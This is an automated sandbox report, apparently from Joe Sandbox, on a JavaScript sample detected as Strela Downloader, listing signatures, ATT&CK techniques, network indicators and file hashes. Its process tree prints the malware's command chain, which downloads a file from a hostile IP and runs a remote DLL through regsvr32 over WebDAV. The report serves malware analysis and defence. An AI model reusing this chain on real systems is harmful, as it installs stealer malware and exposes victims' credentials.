Windows
Analysis Report
17985298091058916725.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 7324 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\17985 2980910589 16725.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7412 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\170 6121767177 29.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7420 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7456 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 7632 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 7872 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 8088 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 20 --field -trial-han dle=1532,i ,174674924 5130560591 0,22266843 8055736167 4,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 7964 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | Virustotal | Browse | ||
8% | ReversingLabs | Script-JS.Trojan.StrelaStealer |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588549 |
Start date and time: | 2025-01-11 02:17:07 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 58s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 19 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 17985298091058916725.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/61@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 172.64.41.3, 162.159.61.3, 184.28.90.27, 23.209.209.135, 199.232.210.172, 2.16.168.107, 2.16.168.105, 23.200.0.196, 23.200.0.173, 192.168.2.9, 13.107.246.45, 3.219.243.226, 20.12.23.50, 23.56.162.204
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, otelrules.azureedge.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
20:18:04 | API Interceptor | |
20:18:08 | API Interceptor | |
20:18:09 | API Interceptor | |
20:18:16 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.4932150638491663 |
Encrypted: | false |
SSDEEP: | 1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1Ztaf:cJhXC9lHmutpJyiRDeJ/aUKrDgnmp |
MD5: | 644C3F6D55250F93C9C62DFD83B45BDF |
SHA1: | C70B12B96E97FE642E2BC45F1DDF95DC084849B6 |
SHA-256: | 3C48A87617DD64DB7B5D25ED92FEF861B17B22A32FE28CA2214C837B5D1F5E6D |
SHA-512: | 4D29242F017244864F130213C9B7A3294E72B260F860CDED6B748F07C5AE26886DCEF970205C0962938A14EDE9FDF56B90D91261183BF87B352BA861E15B8B0D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7216880619337108 |
Encrypted: | false |
SSDEEP: | 1536:jSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:jazaNvFv8V2UW/DLzN/w4wZi |
MD5: | 2CE6CD78E92793535440F9E025F32DC4 |
SHA1: | 2B52AD73394AA19D90BA838F60BC4AB335660011 |
SHA-256: | D9036FFDB2EA69EBD6DA41617E9038311414ED9ADCD18C5F3423DFC7BC5D3694 |
SHA-512: | B40E920CDC0E50306422E9E92D177BDEDAD62C5AE5A18557B2E7D4F126CDE274FE8AB7BFBCED59364E592104B3FB2CF89D3F95EC628C68793342228F9450D80C |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.08132952465988419 |
Encrypted: | false |
SSDEEP: | 3:Ke7mtllKYebUuoGs6/fgsCrZClW/ttjMOR/All+SHY/Xl+/rQLve:KkyKzb4Gxfgs3GLP5AAS4M |
MD5: | A892FA0B1C4371116FBF668E3B22FD9D |
SHA1: | 23813287F1CF801C775341481B1453CE635003C1 |
SHA-256: | A9129A1B565AC9A02C278C8BECD2997092B58F621DDD3ACF9743767F508C950B |
